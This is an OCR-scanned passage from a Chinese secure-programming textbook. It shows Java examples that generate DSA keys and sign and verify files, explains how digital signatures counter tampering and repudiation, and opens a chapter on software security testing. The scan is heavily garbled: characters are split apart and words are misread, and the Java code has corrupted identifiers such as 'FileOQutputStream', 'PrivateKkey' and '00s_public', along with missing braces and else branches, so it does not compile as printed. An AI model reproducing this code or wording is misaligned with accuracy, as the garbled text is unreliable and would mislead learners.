略 过 Java 加 密 体 系 的 讲解 ,在 代码 中 如 果 出 现 新 的 API, 读 者 可 以 参考 Java 文档 。 


P12_02. java 


import java. security. InvalidKeyException; 
import java. security. KeyPair; 
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import java. security. KeyPairGenerator; 


import java. security. NoSuchAlgorithmException; 


import java. security. PrivateKey; 
import java. security. PublicKey; 


import java. security. Signature; 


import java. security. SignatureException; 


public class P14 02 


{ 


private KeyPair key = null; 


Signature sig = null; 
public P14 _02() throws NoSuchAlgorithmException 


{ 


// 形成 DSA 公 钥 对 

KeyPairGenerator keyGen = KeyPairGenerator.getInstance("DSA"); 
keyGen. initialize(1024); 

// 生成 公 钥 和 私 钥 对 

key = keyGen. generateKeyPair(); 

// 实例 化 Signature, 用 于 产生 数字 签名 ,指定 用 DSA 算法 

sig = Signature. getInstance("DSA"); 


public byte[ ] getSignature(String msg) 


throws InvalidKeyException, SignatureException 


byte[ ] msgBytes = msg.getBytes(); 

// 得 到 私 钥 

PrivateKey privateKey = key.getPrivate(); 

// 用 私 钥 来 初始 化 数字 签名 对 象 

sig. initSign(privateKey); 

// 对 msgBytes 实施 签名 

sig. update(msgBytes); 

// 完成 签名 ,将 结果 放 人 字 节 数组 signatureBytes 
byte[ ] signatureBytes = sig. sign(); 

return signatureBytes; 


public boolean verify(String msg, byte[] signatureBytes) 


throws InvalidKeyException, SignatureException 


// 使 用 公 钥 验证 

PublicKey publicKey = key.getPublic(); 
sig. initVerify(publicKey); 

byte[ ] msgBytes = msg.getBytes(); 

// 对 msgBytes 重新 实施 签名 

sig. update(msgBytes); 

return sig. verify(signatureBytes); 


public static void main(String[ ] args) throws Exception 
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{ 
String msg = " 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 原 文 是 :”+ msg); 


P14_02 p14 02 = new P14 02(); 

byte[ ] signatureBytes = p14 _02.getSignature(msg); 
String signature = new String(signatureBytes); 
System. out. println(" 签 名 是 :" + signature); 


boolean verifyResult = pl4 02.verify(msg, signatureBytes); 
if (verifyResult) 
{ 
System. out. println(" 签 名 验证 成 功 "); 


System. out. println(" 签 名 验证 失败 "); 


运行 后 的 效果 如 图 14-3 所 示 。 


图 14-3 


14.3 ”利用 数字 签名 解决 实际 问题 


本 节 用 一 些 简单 的 案例 来 前 述 数字 签名 的 作用 。 在 该 案例 中 ,用 到 了 数据 加 密 和 
数字 签名 。 值 得 一 提 的 是 ,本 节 为 了 描述 方便 ,已 经 将 问题 进行 了 简化 。 实 际 操 作 的 过 
程 中 ,比较 复杂 。 


14.3.1 解决 算 改 问题 


算 改 指 内 容 被 敌 方 恶意 修改 或 者 删除 之 后 用 恶意 内 容 伪 装 , 使 得 收 方 得 到 的 内 容 
不 是 来 自发 方 的 原 有 内 容 。 信 息 自 改 属于 主动 攻击 的 一 种 。 在 用 户 发 出 信息 的 过 程 
中 , 敌 方 可 能 会 对 用 户 发 出 的 信息 进行 修改 或 者 删除 ,让 对 方 得 到 的 不 是 原 有 的 信息 。 
比如 在 发 送 方 给 接收 方 发 出 某 个 命令 的 时 候 敌 方 可 能 会 将 命令 进行 修改 , 改 成 其 他 命 
令 ,让 接收 方 做 出 一 些 对 双方 交易 有 害 的 事情 。 

算 改 无 法 完全 避免 ,但 为 安全 起 见 ,必须 能 够 判断 一 段 消息 是 否 被 自 改 。 当 得 知 信 
息 被 自 改 时 ,能 够 作出 丢弃 的 决定 。 

可 以 通过 数字 签名 方法 来 避免 自 改 。 一 般 思路 如 下 : 

(1) 将 信息 生成 数字 签名 ,并 将 数字 签名 用 接收 方 的 公 钥 加 密 。 
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(2) 接收 方 用 自己 的 私 钥 解密 数字 签名 ,然后 将 消息 再 生成 一 次 签名 ,将 两 个 签名 
作 比 较 , 得 出 结论 。 

本 节 利用 Java 语言 模拟 这 个 过 程 。 首 先 ,发 送 方 生成 一 个 公 钥 一 个 私 钥 , 分 别 保 
存 为 文件 public. key 和 private. key; 任 给 一 个 信息 文件 info. txt, 发送 方 用 自己 的 
private. key 生成 数字 签名 (已 加 密 ) ,将 签名 存放 于 signature. sgn; 接收 方 用 发 送 方 的 
public. key 验证 数字 签名 。 

本 例 使 用 DSA 算法 。 首 先 ,发 送 方 生成 一 个 公 钥 一 个 私 钥 , 分 别 保存 为 文件 : 
public. key 和 private. key。 代 码 如 下 : 


P14_03_Sender_KeyGen. java 


import java. io. FileOutputStream; 
import java. io. ObjectOutputStream; 
import java. security. KeyPair; 

import java. security. KeyPairGenerator; 
import java. security. PrivateKey; 
import java. security. PublicKey; 


/* 发 送 方 生成 一 个 公 钥 一 个 私 钥 ,分 别 保存 为 文件 : public.key 和 private. key*/ 
public class P14_03_Sender KeyGen 


{ 
public static void main(String[ ] args) throws Exception 


{ 
FileOutputStream fos_public = new FileOQOutputStream("public. key"); 
ObjectOutputStream oos_public = new ObjectOutputStream(fos public); 
FileOutputStream fos_private = new FileOutputStream("private.key"); 
ObjectOutputStream oos_private = new ObjectOutputStream(fos private); 
// 形成 DSA 公 钥 对 
KeyPairGenerator keyGen = KeyPairGenerator.getInstance("DSA"); 
keyGen. initialize(1024); 
// 生成 公 钥 和 私 钥 对 
KeyPair key = keyGen. generateKeyPair(); 
PublicKey publicKey = key.getPublic(); 
PrivateKey privateKey = key.getPrivate(); 
// 写 入 文件 
oos_public. writeObject(publicKey) ; 
oos_private. writeObject(privateKey); 
fos_public. close(); 
00s_public. close(); 
fos_private. close(); 
00s_private. close(); 
} 


} 


运行 ,生成 两 个 文件 : private. key 和 public. key。 
然后 ,对 信息 文件 info. txt, 发 送 方 用 自己 的 private. key 生成 数字 签名 ,将 签名 存 
放 于 signature. sgn; 代码 如 下 : 


软件 安全 实现 一 一 安全 编程 技术 


re 
~ | 


P14_03_Sender_SgnGen. java 


import java. io. File; 

import java. io. FileInputStream; 
import java. io. FileQutputStream; 
import java. io. ObjectInputStream; 


Note import java. security. PrivateKey; 
import java. security. Signature; 


// 任 给 一 个 信息 文件 info. txt, 发 送 方 用 public. key 生成 数字 签名 (已 加 密 ) 
// 将 签名 存放 于 signature. sgn 
public class P14_03_Sender_SgnGen 


| { 
| public static void main(String[ ] args) throws Exception 
| { 
| // 读 入 文件 
| File file info = new File("info. txt"); 
| FileInputStream fis_info = new FileInputStream(file_info); 
| int fileInfoLength = (int)file info. length(); 
| byte[ ] infoBytes = new byte[fileInfoLength]; 
| fis_info. read( infoBytes); 
| fis_info. close(); 
| // 发 送 方 读 人 私 钥 
| FileInputStream fis_private = new FileInputStream("private.key"); 
| ObjectInputStream ois_private = new ObjectInputStream(fis private); 
| PrivateKkey privateKey = (PrivateKey)ois_private. readObject(); 
| fis_private. close(); 
| ois_private. close(); 
| // 生成 签名 
| Signature sig = Signature. getInstance( "DSA"); 
| // 用 私 钥 来 初始 化 数字 签名 对 象 
| sig. initSign(privateKey); 
| // 对 msgBytes 实施 签名 
| sig. update( infoBytes) ; 
| // 完成 签名 ,将 结果 放 入 字 节 数组 signatureBytes 
| byte[ ] signatureBytes = sig. sign(); 
| // 将 签名 写 人 文件 signature. sgn 
| FileOutputStream fos_signature = new FileOutputStrean("signature. sgn"); 
| fos_signature. nrite(signatureBytes); 
| fos_signature. close(); 
| } 
} 


运行 后 生成 签名 文件 : signature. sgn。 
最 后 接收 方 用 发 送 方 的 public. key 验证 数字 签名 ,代码 如 下 : 
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P14_03_Receiver_Verify. java ! 


import java. io. File; 1 
import java. io.FileInputStream7 ! 
import java. io. FileOQutputStream; 


import java. io. ObjectInputStream; 
import java. security. InvalidKeyException; Note 


import java. security. KeyPair; 

import java. security. KeyPairGenerator; 

import java. security. NoSuchAlgorithmException; 
import java. security. PrivateKey; 

import java. security. PublicKey; 

import java. security. Signature; 

import java. security. SignatureException; 


// 接收 方 用 发 送 方 的 public. key 验证 数字 签名 
public class P14_03_Receiver Verify 
{ 
public static void main(String[ ] args) throws Exception 
{ 
// 读 入 文件 
File file_info = new File("info.txt"); 
FileInputStream fis_info = new FileInputStream(file info); 
int fileInfoLength = (int)file info. length(); 
byte[ ] infoBytes = new byte[fileInfoLength]; 
fis_info. read( infoBytes); 
fis_info. close(); 


// 读 入 发 送 方 公 钥 

FileInputStream fis public = new FileInputStream("public. key"); 
ObjectInputStream ois public = new ObjectInputStream(fis public); 
PublicKey publicKey = (PublicKey)ois public. readObject(); 
fis_public. close(); 

ois public. close(); 


// 读 入 签名 文件 

File file_signature = new File("signature. sgn"); 

FileInputStreanm fis_signature = new FileInputStream(file_ signature); 
int fileSignatureLength = (int)file signature. length(); 

byte[ ] signatureBytes = new byte[fileSignatureLength]; 
fis_signature. read( signatureBytes); 

fis_signature. close(); 


// 使 用 公 钥 验证 | 
Signature sig= Signature. getInstance( "DSA"); | 
sig. initVerify(publicKey); | 
sig.update( infoBytes); | 
if(sig. verify(signatureBytes)) | 
{ . 
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System. out. println(" 文 件 没有 被 算 改 "); 


食 由 | System. out. println(" 文 件 被 算 改 "); 


如 果 文 件 info. txt 没有 被 算 改 ,运行 后 的 效果 如 图 14-4 所 示 。 
如 果 将 info. txt 稍 加 改动 (如 增加 一 个 回 车 ) 再 运行 , 则 效果 如 图 14-5 所 示 。 
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图 14-4 图 14-5 


14.3.2 解决 抵赖 问题 


抵赖 指 以 下 两 种 情况 : 
。 一 是 收 方 收 到 信息 ,然后 否认 收 到 发 过 来 的 信息 ; 
。 发 方 发 送 有 害 信息 ,然后 否认 发 送 过 该 信息 。 
| 抵赖 问题 也 是 网 络 安全 中 的 一 个 重要 问题 。 此 活动 属于 主动 攻击 的 一 种 , 它 的 特 
”点 主要 体现 在 发 送 方 和 接收 方 中 有 一 方 充当 敌 方 的 角色 。 这 个 活动 和 算 改 活动 的 区 别 
”在 于 ,焦点 集中 在 知道 敌 方 身份 的 情况 下 ,怎样 用 证 据 证 明 它 曾 经 对 网 络 安 全 进行 过 攻 
， 击 。 这 种 活动 的 危害 主要 表现 在 ; 
。 当 发 送 方 充当 敌 方 时 ,发 送 方 传输 给 接收 方 一 个 信息 ,然后 否认 传送 过 此 信息 ， 
如 某 恶意 发 送 方向 另 一 方 传输 一 个 消息 ,该 消息 中 包含 了 一 些 重大 举措 , 当 接 
收 方 执行 这 些 举措 之 后 ,对 自己 造成 了 巨大 的 伤害 ,追究 发 送 方 的 责任 ,但 发 送 
方 否认 发 过 此 信息 ; 
当 接 收 方 充当 敌 方 的 时 候 , 收 到 了 发 送 方 送 过 来 的 信息 ,但 否认 此 消息 来 自 
于 发 送 方 ,如 发 送 方 向 接收 方 发 送 了 网 上 银行 的 一 些 转 账 手续 ,接收 方 接受 
了 转账 之 后 , 却 声称 自己 从 来 没有 收 到 这 个 信息 ,使 得 发 送 方 的 利益 受到 
损害 。 
传统 网 络 安全 协议 中 的 抵赖 问题 一 般 就 是 通过 数字 签名 解决 的 。 下 面 阐述 其 解决 
方法 。 
| 1. 发 送 方 为 敌 方 的 情况 
| 当 发 送 方 给 接收 方 发 送 了 消息 ,造成 接收 方 的 损害 ,发 送 方 对 消息 发 送 的 事实 进行 
”抵赖 的 时 候 , 接 收 方 可 以 通过 如 下 手段 进行 利益 保护 : 
| 。 接收 方向 公正 机 构 提 交 发送 方 发 送 过 的 消息 和 附加 的 数字 签名 ; 
。 公正 机 构 用 消息 的 内 容 生成 单 向 的 消息 摘要 ,然后 将 数字 签名 用 发 送 方 的 公开 
密 钥 进行 解密 ,与 其 进行 核对 ; 
。 如 果 消 息 果真 是 发 送 方 发 送 的 话 ,两 者 应 该 一 样 ; 
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。 由 于 数字 签名 是 利用 发 送 方 的 私有 密 钥 , 对 消息 摘要 进行 加 密 之 后 得 到 的 结 ， 
果 , 而 私有 密 钥 值 在 理论 上 讲 , 只 有 发 送 方 自己 知道 ,发 送 方 就 不 能 对 此 问题 进 
行 抵赖 了 。 
并 提示 ”如果 此 时 发 送 方 还 要 抵赖 ,他 就 必须 证 明 : | 
对 于 同一 条 消息 ,他 人 用 别 的 密 钥 加 密 之 后 的 值 , 为 什么 和 用 它 自 己 的 密 钥 加 密 之 | 
后 的 值 会 一 样 。 即 对 于 同一 段 内 容 , 用 不 同 的 密 钥 加 密 之 后 的 密 文 是 相同 的 。 或 者 
证 明 ; 
他 人 用 别 的 密 钥 加 密 的 内 容 ,用 自己 的 密 钥 解 密 为 什么 会 一 样 。 即 相同 的 一 段 加 
密 消息 ,用 不 同 的 密 铀 是 解密 之 后 的 内 容 会 一 样 。 
以 上 两 件 事情 的 证 明 本 身 就 是 和 密码 体制 的 初衷 相 违 背 的 ,因此 也 是 无 法 证 明 的 ， 
发 送 方 就 根本 无 法 抵赖 曾经 发 送 过 有 害 的 内 容 。 


2. 接收 方 为 敌 方 的 情况 | 

当 接收 方 收 到 了 发 送 方 发 送 的 消息 ,这 个 消息 对 接收 方 有 利 , 接 收 方 用 这 个 消息 进 
行 一 些 有 利 活动 之 后 ,声称 此 消息 不 是 来 自 于 发 送 方 ,继续 要 求 发 送 方 发 送 消息 给 他 ， 
目的 是 为 了 自己 的 利益 ,造成 发 送 方 的 损害 。 接 收 方 对 消息 接收 的 事实 进行 抵赖 的 时 
候 ,发 送 方 可 以 用 如 下 方法 保护 自己 的 利益 : 

。 向 公证 机 构 提 交接 收 方 接收 到 的 消息 和 附加 的 数字 签名 ; 

与 第 一 种 情况 一 样 ,公证 机 构 用 消息 的 内 容 生 成 单 向 的 消息 摘要 ,然后 将 数字 ， 
签名 用 发 送 方 的 公开 密 钥 进 行 解密 ,与 其 进行 核对 ; | 

。 如 果 消 息 果 真是 发 方 发 送 的 话 ,两 者 应 该 一 样 。 

3 提示 “同样 ,数字 签名 是 利用 发 送 方 的 私有 密 钥 对 消息 摘要 进行 加 密 之 后 得 到 
的 结果 ,而 私有 密 钥 值 只 有 发 送 方 自己 知道 。 如 果 公 正 机 构 算出 来 的 消息 摘要 和 将 数 
字 签 名 解密 之 后 的 消息 摘要 相等 的 话 , 接 收 方 就 不 能 对 此 问题 进行 抵赖 了 。 如 果 要 抵 
和 赖 ,也 就 要 必须 证 明 上 一 种 情况 中 提 到 的 两 个 问题 ,和 密码 体制 的 初衷 相 违背 的 ,实际 
上 也 是 不 可 能 的 。 

如 果 接 收 方 属于 敌 方 ,还 有 一 种 情况 , 当 接 收 方 为 了 陷害 某 个 特定 的 发 送 方 ,伪造 
一 个 有 害 的 消息 ,造成 一 定 的 危害 之 后 ,声称 这 个 消息 来 自 于 这 个 特定 的 发 送 方 ,造成 | 
发 送 方 的 损害 。 此 时 ,发 送 方 可 以 通过 如 下 方法 维护 自己 的 利益 : 

， 向 公证 机 构 提 交接 收 方 接收 到 的 消息 和 附加 的 数字 签名 ; 

。 与 第 一 种 情况 一 样 ,公正 机 构 用 消息 的 内 容 生 成 单 向 的 消息 摘要 ,然后 将 数字 

签名 用 发 送 方 的 公开 密 钥 进行 解密 ,与 其 进行 核对 ; 

。 如 果 消 息 果真 不 是 发 方 发 送 的 ,那么 两 者 应 该 不 一 样 。 

太 提 示 。 这样 ,接收 方 就 无 法 陷害 发 送 方 了 ,否则 , 它 就 必须 证 明 : 

一 段 消息 ,用 某 个 人 的 私有 密 钥 加 密 之 后 ,然后 用 它 的 公开 密 钥 解密 得 到 的 数据 无 
法 还 原 成 明文 。 这 个 问题 当然 也 是 不 可 能 得 到 证 明 的 。 


具体 实现 ,和 上 节 类 似 , 此 处 从 略 。 
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小 结 


本 章 结合 数据 的 加 密 保护 ,针对 信息 安全 中 的 另 一 种 攻击 : 主动 攻击 进行 了 讲解 ， 


详细 阐述 了 数字 签名 的 作用 。 


首先 讲解 了 数字 签名 的 原理 ,由 于 不 同 的 语言 对 于 数字 签名 的 实现 原理 基本 相同 ， 


， 本 章 以 Java 语言 为 例 ,实现 了 数字 签名 算法 。 最 后 ,本 章 通 过 一 些 案例 ,解释 了 数字 签 
， 名 能 够 解决 自 改 和 抵赖 问题 的 原理 。 


练 习 


1. 许多 语言 都 支持 数字 签名 算法 ,本 章 主要 用 Java 语言 进行 了 讲解 。 
(1) 选择 Java 语言 以 外 的 任意 一 种 语言 ,实现 基于 DES 的 数字 签名 。 
(2) 用 C 语言 进行 底层 的 签名 。 

2. 抵赖 问题 是 网 络 上 的 一 种 比较 常见 的 问题 。 

(1) 用 数字 签名 方法 解决 发 送 方 抵赖 问题 。 

(2) 用 数字 签名 方法 解决 接收 方 抵赖 问题 。 

3. 数字 签名 是 目前 一 个 比较 活跃 的 研究 领域 。 查 找 相关 文献 : 

(1) 传统 的 数字 签名 有 何 缺 陷 ? 

(2) 了 解 目前 关于 数字 签名 的 研究 现状 。 

4. 真实 网 络 上 ,如 果 发 生 纠纷 ,数字 签名 必须 经 过 仲裁 。 

(1) 数字 签名 由 谁 来 仲裁 ? 

(2) 仲裁 的 过 程 是 怎样 的 ? 

5. 数字 证 书 也 是 在 网 络 上 用 得 较 多 的 一 种 认证 方法 。 

(1) 查阅 相关 文献 ,了 解数 字 证 书 。 

(2) 数字 签名 和 数字 证 书 有 何 关系 ? 


MSL 
软件 安全 测试 


质量 保证 活动 是 软件 开发 过 程 中 重要 的 环节 ,而 软件 测试 是 软件 质量 保证 的 关键 
手段 。 

实际 上 ,软件 测试 的 工作 量 , 在 软件 开发 过 程 中 占据 较 大 的 一 部 分 ,测试 做 得 好 ,会 
大 大 降低 维护 的 成 本 。 测 试 的 主要 目标 是 找到 软件 中 存在 的 错误 ,并 加 以 排除 ,最 终 把 
一 个 高 质量 的 软件 系统 交 给 用 户 使 用 。 

随 着 应 用 的 广泛 ,软件 的 安全 性 也 就 越 来 越 成 为 软件 的 关键 质量 指标 ,因此 ,针对 
安全 问题 的 测试 又 显得 更 为 重要 。 

本 章 主要 针对 安全 测试 和 评审 问题 进行 概述 ,首先 讲解 了 软件 测试 的 概念 、 目 的 、 
意义 和 方法 ,然后 阐述 了 针对 安全 问题 的 软件 测试 ,并 对 这 些 测 试 方法 进行 了 分 类 。 


15.1 软件 测试 概述 中 


15.1.1 软件 测试 的 概念 


IEEE 对 软件 测试 给 出 的 定义 是 :“ 使 用 人 工 或 者 自动 手段 来 运行 或 测定 某 个 系 
统 , 其 目的 在 于 检测 该 系统 是 否 满足 规定 的 需求 ,或 者 弄 清 楚 预 期 的 结果 与 实际 结果 的 
差别 .”, 因 此 ,软件 测试 ,实际 上 是 为 了 发 现 软件 中 的 错误 ,并 在 交付 用 户 使 用 前 解决 这 
些 错误 ,这 几乎 成 为 一 个 公认 的 概念 。 
这 里 的 “错误 ” ,实际 上 是 一 个 广义 的 概念 ,初学 者 往往 会 将 其 理解 为 “编码 错误 ”， 
实际 上 ,能 够 引起 软件 错误 的 因素 很 多 , 绝 不 仅仅 是 编码 方面 的 原因 ,包括 很 广泛 的 
内 容 : 
。 软件 的 需求 分 析 者 曲解 了 用 户 的 需求 ,测试 时 发 现实 现 的 流程 和 用 户 的 叙述 不 
一 样 ; 

。 软件 的 设计 者 在 设计 时 没有 考虑 某 些 现场 因素 ,导致 软件 在 真实 环境 下 测试 时 
无 法 正常 运行 ; 

。 软件 编码 者 粗心 大 意 ,将 某 些 逻 辑 流程 写 错 , 使 得 程序 得 不 到 料想 的 结果 ,等 等 。 
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Re 
15.1.2 软件 测试 的 目的 和 意义 


由 此 可 见 , 软 件 测试 的 根本 目标 是 尽 可 能 多 地 发 现 并 排除 软件 中 潜藏 的 错误 ,最 终 
把 一 个 高 质量 的 软件 系统 交 给 用 户 使 用 。 

Grenford J. Myers 曾 对 软件 测试 的 目的 提出 过 以 下 观点 : 

。 测试 是 为 了 发 现 程序 中 的 错误 而 执行 程序 的 过 程 ; 

。 好 的 测试 方案 是 尽 可 能 发 现 迄 今 为 止 尚未 发 现 的 错误 的 测试 方案 ; 

。 成 功 的 测试 是 发 现 了 至 今 为 止 尚未 发 现 的 错误 的 测试 。 

不 过 ,并 不 能 说 ,软件 测试 效果 的 评价 指标 就 是 查 出 错误 的 个 数 ,认为 查 不 出 错误 


”的 测试 就 是 没有 价值 的 测试 ,这 是 片面 的 ,因为 ; 


。 没有 发 现 错误 ,或 者 发 现 错误 较 少 的 测试 ,也 是 有 价值 的 ,可 能 说 明 软件 质量 较 
高 ,因此 ,测试 同时 也 是 评定 软件 质量 的 一 种 标准 ; 

发 现 很 多 错误 的 测试 ,不 一 定 是 成 功 的 ,如 果 软 件 本 身 质 量 较 低 , 那 么 不 能 通过 
发 现 错误 的 个 数 越 多 ,来 得 出 软件 剩 下 的 错误 越 少 的 结论 ; 当前 发 现 的 错误 越 
多 ,可 能 剩 下 的 错误 也 很 多 。 

从 另 一 角度 讲 , 通 过 软件 测试 找到 错误 ,除了 能 够 解决 错误 外 ,还 可 以 通过 分 析 错 


误 产生 的 原因 和 错误 的 发 生 趋势 ,帮助 软件 的 生产 者 发 现 当前 软件 开发 过 程 中 的 缺陷 ， 


以 便 及 时 改进 ; 另外 ,通过 对 错误 进行 分 析 , 也 可 以 帮助 测试 人 员 设 计 出 更 加 有 针对 性 
的 测试 方法 ,提高 测试 工作 的 效率 和 效果 。 
软件 测试 的 意义 主要 体现 在 : 
。 减少 软件 中 错误 。 通 过 软件 测试 可 以 发 现 软件 中 存在 的 错误 ,通过 完全 地 修改 
这 些 错误 ,可 以 减少 软件 中 错误 ,提高 软件 的 可 靠 性 。 
。 评估 软件 的 综合 性 能 。 通 过 软件 测试 ,对 发 现 的 错误 进行 分 析 和 统计 ,可 以 评 
佑 软件 综合 性 能 。 当 然 , 即 使 软件 测试 没有 发 现任 何 错误 ,也 可 以 作为 评估 软 
件 综合 性 能 的 手段 ,等 等 。 


15.1.3 ”软件 测试 方法 


从 实际 项 目的 测试 工作 划分 ,软件 测试 工作 可 以 划分 为 以 下 几 个 过 程 。 

。 单元 测试 : 对 软件 的 每 一 个 程序 单元 进行 测试 ,检查 各 个 程序 模块 的 正确 性 ; 

并 配合 适当 的 代码 审查 。 

。 集成 测试 : 把 已 测试 过 的 模块 组 装 起 来 ,以 便 发 现 与 接口 有 关 的 问题 ,如 数据 
模块 间 传递 .模块 组 合 性 能 、 模 块 调 用 性 能 等 。 

。 确认 测试 : 检查 软件 是 否 满足 了 需求 规格 说 明 书 中 的 各 种 需求 ,以 及 软件 配置 
是 否 完全 、 正 确 ; 该 测试 又 叫做 验收 测试 ,目的 是 验证 软件 的 有 效 性 。 

。 系统 测试 : 把 已 经 通过 验收 的 软件 , 放 入 实际 运行 环境 中 运行 ; 用 户 记录 在 测 
试 过 程 中 遇 到 的 一 切 问 题 , 定 期 报告 给 开发 者 。 

这 几 个 测试 过 程 ,从 软件 开发 生命 周期 的 一 开始 就 应 该 执行 ,因此 ,测试 在 软件 工 


， 程 中 的 地 位 如 图 15-1 所 示 。 


第 15 章 软件 安全 测试 


需求 分 析 | “| 总 体 设计 |-~| 详细 设计 | -~| 。 编码 
t t 


f 
系统 测试 -| 确认 测试 =-| 集成 测试 | 一 -| 单元 测试 上- 


15-1 
软件 测试 的 方法 ,可 以 有 很 多 种 分 类 ,第 一 种 是 分 为 静态 测试 方法 和 动态 测试 方法 。 
(1) 静态 测试 方法 。 
该 方法 中 ,不 实际 运行 被 测试 的 软件 ,对 软件 进行 分 析 、 检 查 和 审阅 ,来 寻找 逻辑 错 
误 。 主 要 工作 包括 : 
。 对 需求 规格 说 明 书 ,软件 设计 说 明 书 、 源 程序 做 检查 和 审阅 ; 
。 检查 以 上 工作 是 否 符合 标准 和 规范 ; 
。 通过 结构 分 析 、 流 图 分 析 等 方法 ,指出 软件 缺陷 ; 
。 对 各 种 文档 进行 测试 ,等 等 。 
静态 测试 是 软件 开发 中 十 分 有 效 的 质量 控制 方法 之 一 。 该 方法 特别 是 在 软件 开发 
生命 周期 的 早期 和 中 期 阶段 非常 有 效 。 此 时 ,由 于 程序 还 没有 编 出 来 ,可 以 直接 运行 的 
代码 尚未 产生 ,此 时 又 必须 对 设计 的 一 些 思路 进行 检查 或 者 审核 ,因为 初期 的 工作 质量 
可 能 直接 关系 到 软件 开发 的 成 本 ,因此 ,在 这 些 阶段 ,可 以 大 量 采用 静态 测试 方法 。 
静态 测试 主要 靠 人 工 来 完成 ,不 过 , 近 些 年 来 ,也 开发 了 不 少 自动 化 的 工具 ,进行 计 
算 机 辅助 测试 ,但 是 ,短期 内 想 要 实现 其 测试 的 自动 化 ,难度 较 大 。 静 态 测试 的 质量 更 
多 地 依赖 于 测试 的 组 织 和 测试 者 的 水 平 ,定性 地 分 析 软 件 质 量 的 情况 居多 ,具有 一 定 的 | 
局 限 性 。 | 
(2) 动态 测试 法 。 
动态 测试 和 静态 测试 不 同 ,在 测试 的 过 程 中 ,实际 运行 软件 ,检测 软件 的 动态 行为 
和 运行 结果 的 正确 性 。 动 态 测试 包括 两 个 基本 要 素 : 一 是 被 测 软件 ; 二 是 在 软件 运行 
过 程 中 的 输入 数据 ,每 一 次 测试 需要 的 测试 数据 叫做 测试 用 例 。 因 此 ,动态 测试 一 般 在 
软件 编码 阶段 完成 之 后 进行 。 
动态 测试 由 于 其 比较 强 的 错误 检测 能 力 , 受 到 了 广泛 的 采用 。 
动态 测试 的 过 程 是 : 
。 设计 一 个 测试 用 例 , 输 入 到 程序 中 ; 
。 看 预期 结果 和 实际 运行 结果 是 否 一 样 ; 
。 得 出 最 后 结论 。 
动态 测试 方法 中 ,其 最 大 的 难度 是 测试 用 例 的 设计 ,因为 如 果 要 进行 穷 举 性 测试 ， 
完全 是 不 可 能 的 。 
另 一 种 分 类 方法 是 从 对 程序 内 部 结构 的 可 见 性 来 分 ,分 为 黑 盒 测试 和 白 盒 测试 。 
(1) 黑 盒 测试 方法 。 
黑 盒 测试 又 称 为 功能 测试 。 用 该 方法 进行 测试 时 ,把 被 测 程序 当做 一 个 黑 盒 ,测试 
者 无 须知 道 程序 内 部 结构 ,只 需要 知道 程序 的 输入 以 及 输出 是 否 和 预期 输出 相符 。 用 | 
例 设计 方法 有 : | 
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。 等 价 类 划分 法 ; 
。 边界 值 分 析 法 ; 
。 因果 图 法 ,等 等 。 
(2) 白 盒 测试 方法 。 
白 盒 测试 又 称 结构 测试 或 逻辑 驱动 测试 。 用 该 方法 进行 测试 时 ,测试 者 必须 了 解 
被 测 程序 的 内 部 结构 ,根据 被 测 程序 的 内 部 构造 设计 测试 用 例 。 在 白 盒 测试 的 过 程 中 ， 


。 需要 测试 用 例 的 设计 对 被 测 程序 的 结构 做 到 一 定 程度 的 蓝 盖 。 常 见 的 测试 用 例 设 计 方 
”法 有 : 


。 基 本 路 径 法 ; 
。 条 件 测试 法 ; 
。 循环 测试 法 ,等 等 。 

将 软件 测试 划分 为 静态 测试 和 动态 测试 ,与 划分 为 黑 盒 测 试 和 白 盒 测试 ,是 没有 了 矛 
盾 的 ,两 种 方法 互相 渗透 。 一 般 情 况 下 ,静态 测试 只 利用 白 盒 测 试 法 ,动态 测试 则 使 用 
了 黑 盒 测 试 与 白 盒 测试 ; 从 另 一 个 角度 说 , 黑 盒 测试 一 般 都 是 用 于 动态 测试 ,而 白 盒 测 


。 试 一 般 可 以 用 于 静态 测试 和 动态 测试 。 


15.2 针对 软件 安全 问题 的 测试 


15.2.1 软件 安全 测试 的 必要 性 
安全 测试 ,在 充分 考虑 软件 安全 性 问题 的 前 提 下 进行 的 测试 ,普通 的 软件 测试 的 主 


要 目的 是 : 确保 软件 不 会 去 完成 没有 预先 设计 的 功能 ,确保 软件 能 够 完成 预先 设计 的 
”功能 。 但 是 ,安全 测试 更 有 针对 性 同时 可 能 采用 一 些 和 普通 测试 不 一 样 的 测试 手段 ,如 
| 攻击 和 反攻 击 技 术 。 因 此 ,实际 上 ,安全 测试 就 是 一 轮 多 角度 ,全 方位 的 攻击 和 反攻 击 ， 


其 目的 就 是 要 抢 在 攻击 者 之 前 尽 可 能 多 地 找到 软件 中 的 漏洞 ,以 减少 软件 遭 到 攻击 的 
可 能 性 。 

安全 测试 基于 软件 需求 说 明 书 中 关于 安全 性 的 功能 需求 说 明 ,测试 的 内 容 主要 是 ， 
软件 的 安全 功能 实现 是 否 与 安全 需求 一 致 。 通 常情 况 下 ,软件 的 安全 需求 包括 

”数据 保密 和 完整 可 用 ; 

。 通信 过 程 中 的 身份 认证 ,授权 ,访问 控制 ; 

。 通信 方 的 不 可 抵赖 ; 

。 隐私 保护 、 安 全 管理 ; 

。 软件 运行 过 程 中 的 安全 漏洞 ,等 等 。 

以 一 个 Web 网 站 为 例 , 需 要 考虑 的 问题 可 如 表 15-1 所 示 。 

因此 ,软件 安全 测试 和 一 般 的 测试 具有 很 大 的 区 别 。 一 般 测试 主要 是 确定 软件 的 


功能 能 否 达 到 ,如 果 没有 达到 ,就 进行 修改 ,其 任务 具有 一 定 的 确定 性 。 


但 是 ,安全 测试 主要 是 检查 软件 所 达到 的 功能 是 否 安全 可 靠 , 需 要 证 明 的 是 软件 不 


”会 出 现 安全 方面 的 问题 ,如 : 
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表 15-1 Web 网 站 需要 考虑 的 问题 


考虑 的 方面 考虑 的 内 容 


用 户 权限 划分 是 否 得 当 

用 户 权限 改变 是 否 会 造成 混乱 

用 户 数据 是 否 会 混淆 

程序 本 身 的 安全 用 户 密码 是 否 可 以 用 某 些 手段 得 知 
系统 可 否 有 后 门 登录 

是 否 进行 了 session 检查 

是 否 有 SQL 注入 、 跨 站 脚本 等 隐患 ,等 等 


服务 器 是 否 存 在 漏洞 被 实施 DoS 攻击 
是 否 可 能 被 攻击 者 注入 木马 
科 人 全 操作 系统 是 否 安全 
防火 墙 和 杀毒 软件 是 否 齐全 并 有 效 , 等 等 
系统 数据 是 否 机 密 
系统 数据 是 否 完整 
和 系统 数据 是 否 进行 了 很 好 的 权限 控制 
系统 数据 可 备份 和 恢复 能 力 如 何 , 等 等 
是 否 能 够 保证 每 周 7 天 ,每 天 24 小 时 连续 工作 
